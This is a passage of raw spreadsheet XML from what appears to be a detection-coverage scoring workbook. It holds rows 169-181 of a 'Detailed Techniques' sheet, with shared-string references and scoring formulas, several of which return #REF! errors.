    </row>
    <row r="169" spans="1:25" ht="327.75" x14ac:dyDescent="0.45">
      <c r="A169" s="8" t="s">
        <v>97</v>
      </c>
      <c r="B169" s="8" t="s">
        <v>0</v>
      </c>
      <c r="C169" s="25" t="s">
        <v>932</v>
      </c>
      <c r="D169" s="10" t="s">
        <v>933</v>
      </c>
      <c r="E169" s="10" t="s">
        <v>934</v>
      </c>
      <c r="F169" s="10" t="s">
        <v>871</v>
      </c>
      <c r="G169" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K169,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H169" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F169&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F169))-LEN(SUBSTITUTE(TRIM(F169),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I169" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F169&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F169))-LEN(SUBSTITUTE(TRIM(F169),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J169" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F169&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F169))-LEN(SUBSTITUTE(TRIM(F169),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K169" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L169" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F169&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F169))-LEN(SUBSTITUTE(TRIM(F169),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M169" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N169" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F169&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F169))-LEN(SUBSTITUTE(TRIM(F169),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O169" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P169" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F169&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F169))-LEN(SUBSTITUTE(TRIM(F169),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q169" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R169" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F169&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F169))-LEN(SUBSTITUTE(TRIM(F169),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S169" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T169" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F169&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F169))-LEN(SUBSTITUTE(TRIM(F169),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U169" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V169" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F169&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F169))-LEN(SUBSTITUTE(TRIM(F169),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W169" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X169" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F169&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F169))-LEN(SUBSTITUTE(TRIM(F169),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y169" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="170" spans="1:25" ht="138.75" customHeight="1" x14ac:dyDescent="0.45">
      <c r="A170" s="8" t="s">
        <v>168</v>
      </c>
      <c r="B170" s="8" t="s">
        <v>1</v>
      </c>
      <c r="C170" s="25" t="s">
        <v>935</v>
      </c>
      <c r="D170" s="10" t="s">
        <v>936</v>
      </c>
      <c r="E170" s="10" t="s">
        <v>937</v>
      </c>
      <c r="F170" s="10" t="s">
        <v>938</v>
      </c>
      <c r="G170" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K170,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H170" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F170&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F170))-LEN(SUBSTITUTE(TRIM(F170),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I170" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F170&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F170))-LEN(SUBSTITUTE(TRIM(F170),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J170" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F170&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F170))-LEN(SUBSTITUTE(TRIM(F170),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K170" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L170" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F170&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F170))-LEN(SUBSTITUTE(TRIM(F170),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M170" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N170" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F170&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F170))-LEN(SUBSTITUTE(TRIM(F170),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O170" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P170" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F170&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F170))-LEN(SUBSTITUTE(TRIM(F170),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q170" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R170" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F170&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F170))-LEN(SUBSTITUTE(TRIM(F170),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S170" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T170" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F170&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F170))-LEN(SUBSTITUTE(TRIM(F170),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U170" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V170" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F170&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F170))-LEN(SUBSTITUTE(TRIM(F170),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W170" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X170" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F170&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F170))-LEN(SUBSTITUTE(TRIM(F170),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y170" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="171" spans="1:25" ht="256.5" x14ac:dyDescent="0.45">
      <c r="A171" s="8" t="s">
        <v>185</v>
      </c>
      <c r="B171" s="8" t="s">
        <v>939</v>
      </c>
      <c r="C171" s="25" t="s">
        <v>940</v>
      </c>
      <c r="D171" s="10" t="s">
        <v>941</v>
      </c>
      <c r="E171" s="10" t="s">
        <v>937</v>
      </c>
      <c r="F171" s="10" t="s">
        <v>942</v>
      </c>
      <c r="G171" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K171,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H171" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F171&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F171))-LEN(SUBSTITUTE(TRIM(F171),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I171" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F171&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F171))-LEN(SUBSTITUTE(TRIM(F171),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J171" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F171&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F171))-LEN(SUBSTITUTE(TRIM(F171),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K171" s="51">
        <f t="shared" ref="K171:K175" si="24">FLOOR(AVERAGE(H171:J171),1)</f>
        <v>0</v>
      </c>
    </row>
    <row r="172" spans="1:25" ht="242.25" x14ac:dyDescent="0.45">
      <c r="A172" s="8" t="s">
        <v>137</v>
      </c>
      <c r="B172" s="8" t="s">
        <v>3</v>
      </c>
      <c r="C172" s="25" t="s">
        <v>943</v>
      </c>
      <c r="D172" s="10" t="s">
        <v>944</v>
      </c>
      <c r="E172" s="10" t="s">
        <v>945</v>
      </c>
      <c r="F172" s="10" t="s">
        <v>946</v>
      </c>
      <c r="G172" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K172,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H172" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F172&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F172))-LEN(SUBSTITUTE(TRIM(F172),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I172" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F172&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F172))-LEN(SUBSTITUTE(TRIM(F172),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J172" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F172&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F172))-LEN(SUBSTITUTE(TRIM(F172),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K172" s="51">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
    </row>
    <row r="173" spans="1:25" ht="242.25" x14ac:dyDescent="0.45">
      <c r="A173" s="8" t="s">
        <v>161</v>
      </c>
      <c r="B173" s="8" t="s">
        <v>9</v>
      </c>
      <c r="C173" s="25" t="s">
        <v>947</v>
      </c>
      <c r="D173" s="10" t="s">
        <v>948</v>
      </c>
      <c r="E173" s="10" t="s">
        <v>949</v>
      </c>
      <c r="F173" s="10" t="s">
        <v>950</v>
      </c>
      <c r="G173" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K173,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H173" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F173&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F173))-LEN(SUBSTITUTE(TRIM(F173),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I173" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F173&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F173))-LEN(SUBSTITUTE(TRIM(F173),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J173" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F173&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F173))-LEN(SUBSTITUTE(TRIM(F173),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K173" s="51">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
    </row>
    <row r="174" spans="1:25" ht="228" x14ac:dyDescent="0.45">
      <c r="A174" s="8" t="s">
        <v>188</v>
      </c>
      <c r="B174" s="8" t="s">
        <v>6</v>
      </c>
      <c r="C174" s="25" t="s">
        <v>951</v>
      </c>
      <c r="D174" s="10" t="s">
        <v>952</v>
      </c>
      <c r="E174" s="10" t="s">
        <v>953</v>
      </c>
      <c r="F174" s="10" t="s">
        <v>954</v>
      </c>
      <c r="G174" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K174,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H174" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F174&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F174))-LEN(SUBSTITUTE(TRIM(F174),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I174" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F174&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F174))-LEN(SUBSTITUTE(TRIM(F174),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J174" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F174&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F174))-LEN(SUBSTITUTE(TRIM(F174),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K174" s="51">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
    </row>
    <row r="175" spans="1:25" ht="199.5" x14ac:dyDescent="0.45">
      <c r="A175" s="8" t="s">
        <v>144</v>
      </c>
      <c r="B175" s="8" t="s">
        <v>3</v>
      </c>
      <c r="C175" s="25" t="s">
        <v>955</v>
      </c>
      <c r="D175" s="10" t="s">
        <v>956</v>
      </c>
      <c r="E175" s="10" t="s">
        <v>957</v>
      </c>
      <c r="F175" s="10" t="s">
        <v>958</v>
      </c>
      <c r="G175" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K175,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H175" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F175&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F175))-LEN(SUBSTITUTE(TRIM(F175),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I175" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F175&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F175))-LEN(SUBSTITUTE(TRIM(F175),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J175" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F175&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F175))-LEN(SUBSTITUTE(TRIM(F175),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K175" s="51">
        <f t="shared" si="24"/>
        <v>0</v>
      </c>
    </row>
    <row r="176" spans="1:25" ht="285" x14ac:dyDescent="0.45">
      <c r="A176" s="8" t="s">
        <v>146</v>
      </c>
      <c r="B176" s="8" t="s">
        <v>5</v>
      </c>
      <c r="C176" s="25" t="s">
        <v>959</v>
      </c>
      <c r="D176" s="10" t="s">
        <v>960</v>
      </c>
      <c r="E176" s="10" t="s">
        <v>961</v>
      </c>
      <c r="F176" s="10" t="s">
        <v>962</v>
      </c>
      <c r="G176" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K176,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H176" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F176&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F176))-LEN(SUBSTITUTE(TRIM(F176),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I176" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F176&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F176))-LEN(SUBSTITUTE(TRIM(F176),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J176" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F176&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F176))-LEN(SUBSTITUTE(TRIM(F176),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K176" s="51">
        <f t="shared" ref="K176:K220" si="25">FLOOR(AVERAGE(H176:J176),1)</f>
        <v>0</v>
      </c>
    </row>
    <row r="177" spans="1:11" ht="199.5" x14ac:dyDescent="0.45">
      <c r="A177" s="8" t="s">
        <v>219</v>
      </c>
      <c r="B177" s="8" t="s">
        <v>0</v>
      </c>
      <c r="C177" s="25" t="s">
        <v>963</v>
      </c>
      <c r="D177" s="10" t="s">
        <v>964</v>
      </c>
      <c r="E177" s="10" t="s">
        <v>965</v>
      </c>
      <c r="F177" s="10" t="s">
        <v>966</v>
      </c>
      <c r="G177" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K177,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H177" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F177&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F177))-LEN(SUBSTITUTE(TRIM(F177),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I177" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F177&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F177))-LEN(SUBSTITUTE(TRIM(F177),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J177" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F177&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F177))-LEN(SUBSTITUTE(TRIM(F177),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K177" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="178" spans="1:11" ht="128.25" x14ac:dyDescent="0.45">
      <c r="A178" s="8" t="s">
        <v>190</v>
      </c>
      <c r="B178" s="8" t="s">
        <v>967</v>
      </c>
      <c r="C178" s="25" t="s">
        <v>968</v>
      </c>
      <c r="D178" s="10" t="s">
        <v>969</v>
      </c>
      <c r="E178" s="10" t="s">
        <v>970</v>
      </c>
      <c r="F178" s="10" t="s">
        <v>971</v>
      </c>
      <c r="G178" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K178,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H178" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F178&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F178))-LEN(SUBSTITUTE(TRIM(F178),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I178" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F178&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F178))-LEN(SUBSTITUTE(TRIM(F178),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J178" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F178&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F178))-LEN(SUBSTITUTE(TRIM(F178),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K178" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="179" spans="1:11" ht="171" x14ac:dyDescent="0.45">
      <c r="A179" s="8" t="s">
        <v>181</v>
      </c>
      <c r="B179" s="8" t="s">
        <v>1</v>
      </c>
      <c r="C179" s="25" t="s">
        <v>972</v>
      </c>
      <c r="D179" s="10" t="s">
        <v>973</v>
      </c>
      <c r="E179" s="10" t="s">
        <v>974</v>
      </c>
      <c r="F179" s="10" t="s">
        <v>975</v>
      </c>
      <c r="G179" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K179,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H179" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F179&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F179))-LEN(SUBSTITUTE(TRIM(F179),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I179" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F179&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F179))-LEN(SUBSTITUTE(TRIM(F179),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J179" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F179&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F179))-LEN(SUBSTITUTE(TRIM(F179),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K179" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="180" spans="1:11" ht="327.75" x14ac:dyDescent="0.45">
      <c r="A180" s="8" t="s">
        <v>150</v>
      </c>
      <c r="B180" s="8" t="s">
        <v>976</v>
      </c>
      <c r="C180" s="25" t="s">
        <v>977</v>
      </c>
      <c r="D180" s="10" t="s">
        <v>978</v>
      </c>
      <c r="E180" s="10" t="s">
        <v>979</v>
      </c>
      <c r="F180" s="10" t="s">
        <v>980</v>
      </c>
      <c r="G180" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K180,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H180" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F180&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F180))-LEN(SUBSTITUTE(TRIM(F180),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I180" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F180&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F180))-LEN(SUBSTITUTE(TRIM(F180),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J180" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F180&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F180))-LEN(SUBSTITUTE(TRIM(F180),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K180" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="181" spans="1:11" ht="171" x14ac:dyDescent="0.45">
      <c r="A181" s="8" t="s">
        <v>220</v>
      </c>
      <c r="B181" s="8" t="s">
        <v>0</v>
      </c>
      <c r="C181" s="25" t="s">
        <v>981</v>
      </c>
      <c r="D181" s="10" t="s">
        <v>982</v>
      </c>
      <c r="E181" s="10" t="s">
        <v>983</v>
      </c>
      <c r="F181" s="10" t="s">
        <v>984</v>
      </c>
      <c r="G181" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K181,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H181" s="51">
